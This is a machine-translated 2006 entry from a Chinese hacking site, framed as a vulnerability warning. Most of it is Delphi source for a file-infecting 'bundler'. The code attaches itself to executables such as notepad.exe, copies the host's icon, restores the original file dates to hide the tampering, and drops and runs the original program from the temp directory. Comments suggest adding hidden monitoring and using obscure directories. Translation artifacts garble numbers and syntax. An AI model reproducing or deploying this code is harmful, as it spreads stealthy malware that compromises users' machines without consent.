Bundled execution file of the new thinking-vulnerability warning-the black bar safety net

ID MYHACK58:62200610922
Type myhack58
Reporter 佚名
Modified 2006-08-06T00:00:00


Latest feature: with app bundle, the icon for the other program's icon This demonstration program does not have form, compiled, compressed after only 40K, run after not long memory-resident If you add the hidden form, plus the search perform the functions of the program, coupled with the monitoring function of the system, plus the % $ # @ * ^ ...

Program in a few numbers to determine: 1 in the present program compiled with Aspack. Exe compression,The size is 4 1 4 7 2 2 after analysis, the program is using Aspack. Exe after compression, the icon of the front part length 4 0 7 5 1, icon data Located from the 4 0 7 5 2 byte 6 4 byte 0, the icon after 8 1 byte

The other programs bundled in the process: The program before the 4 0 7 5 1 byte+is a bundle app icons+this program the last 8 1 byte+is a bundle app of all

How to find icon position: The program's icon is set to a 3 2*3 2 Red blocks, the program is compiled, compressed, with a hex Editing software loaded, find the“9 9 9 9 9 9”a string can be. Later you can program plus other suitable icon. Hex editing software:commonly used UltraEdit to. I think it has a date limit, self-compiled a, hex edit, compare, search function, and constantly improve, to deal with a few hundred K file no problem: http://guanbh.top263.net/download/hexedit.exe } program exe2;

uses classes, Tlhelp32, windows, graphics, ShellAPI, SysUtils;

{$R *. RES}

var lppe:TProcessEntry32; found:boolean; handle:THandle; ProcessStr,ExeName:string; WinDir:pchar; const MySize=4 1 4 7 2; {!! This value according to the compiled or compressed size of the file to be modified!!}

procedure copy2(s:string); var s1,s2,IcoStream:TMemoryStream; File2:TFilestream; ch:array[0..1] of char; ss:string; filetime,fhandle:integer; l:integer; File2Icon:Ticon; begin {If file s does not exist} if FileExists(s)=False then exit; try {If the file does not contain the icon, it does not bundle} File2Icon:=Ticon. Create; l:=extracticon(handle,pchar(s),0); if l=0 then begin File2Icon. Free; exit; end else begin {The extraction being bundled app icon} File2Icon. Handle:=extracticon(handle,pchar(s),0); IcoStream:=TMemoryStream. Create; File2Icon. SaveToStream(IcoStream); File2Icon. Free; end; {Determine the file s did the first 2 in the program header'MZ'to. If there is, that has merged} File2:=TFilestream. Create(s,fmopenread); if File2. The Size>MySize then begin File2. Position:=MySize; File2. Read(ch,2); ss:=copy(ch,1,2); if ss='MZ' then begin File2. Free; exit; end; end; File2. Free;

{The document and the document s combined paper+s=s}

s2:=TMemoryStream. Create; s2. loadfromfile(ExeName); s1:=TMemoryStream. Create;

{ Join the program front 4 0 7 5 1 byte First 4 0 7 5 2 byte 6 4 0 Byte icon data !! The following digital 40751,81 according to the actual situation modify!! } s1. the CopyFrom(s2,4 0 7 5 1); {The icon will be changed to be tied to the program icon,icon size is 7 6 6} IcoStream. Position:=1 2 6; s1. The CopyFrom(IcoStream,6 4 0); IcoStream. Free; s2. Position:=4 0 7 5 1+6 4 0; {Join the program in the rear of the 8 1-byte} s1. The CopyFrom(s2,8 1); s2. clear; s2. loadfromfile(s); s1. seek(s1. size,soFromBeginning); {Added by a bundled program all of the} s1. the CopyFrom(s2,s2. size); s2. free; {Get the file s date} fhandle:=FileOpen(s, fmOpenread); filetime:=filegetdate(fhandle); fileclose(fhandle); s1. SaveToFile(s); {Recover a file s date} fhandle:=FileOpen(s, fmOpenwrite); filesetdate(fhandle,filetime); fileclose(fhandle); s1. free; except end; end;

procedure CreateFileAndRun; var s1,s2:TMemoryStream; TempDir:pchar; cmdstr:string; a:integer; Begin s1:=TMemoryStream. Create; s1. loadfromfile(ExeName); if s1. Size=MySize then begin s1. Free; exit; end; s1. seek(MySize,soFromBeginning); s2:=TMemoryStream. Create; s2. the CopyFrom(s1,s1. Size-MySize); GetMem(TempDir,2 5 5); GetTempPath(2 5 5,TempDir); try

{ Put a file release to a temporary directory. If you don't want to let people see in this directory is released under a pile of papers, can be changed to other more hidden directory, As c:\windows(or winnt)\d...(☆what is this directory? You go to study!☆) }

s2. SaveToFile(TempDir+'\'+ExtractFileName(ExeName)); except end; cmdstr:="; a:=1; while ParamStr(a)<>" do begin cmdstr:=cmdstr+ParamStr(a)+' '; inc(a); end; {Run the real Program Files} winexec(pchar(TempDir+'\'+ExtractFileName(ExeName)+' '+cmdstr),SW_SHOW); freemem(TempDir); s2. free; s1. free; end;

begin GetMem(WinDir,2 5 5); GetWindowsDirectory(WinDir,2 5 5); ExeName:=ParamStr(0); handle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); found:=Process32First(handle,lppe); ProcessStr:="; while found do begin ProcessStr:=ProcessStr+lppe. szExeFile;{list all the processes} found:=Process32Next(handle,lppe); end; {If notepad is not running, and it tied together} if pos(WinDir+'\notepad.exe',ProcessStr)=0 then begin copy2(WinDir+'\notepad.exe'); end; {Other need to bundle the files if pos(...,ProcessStr)=0 then begin copy2(...); end; ... } freemem(WinDir); { You want to use this program to do something other... } CreateFileAndRun;{release the file with parameters to run} end.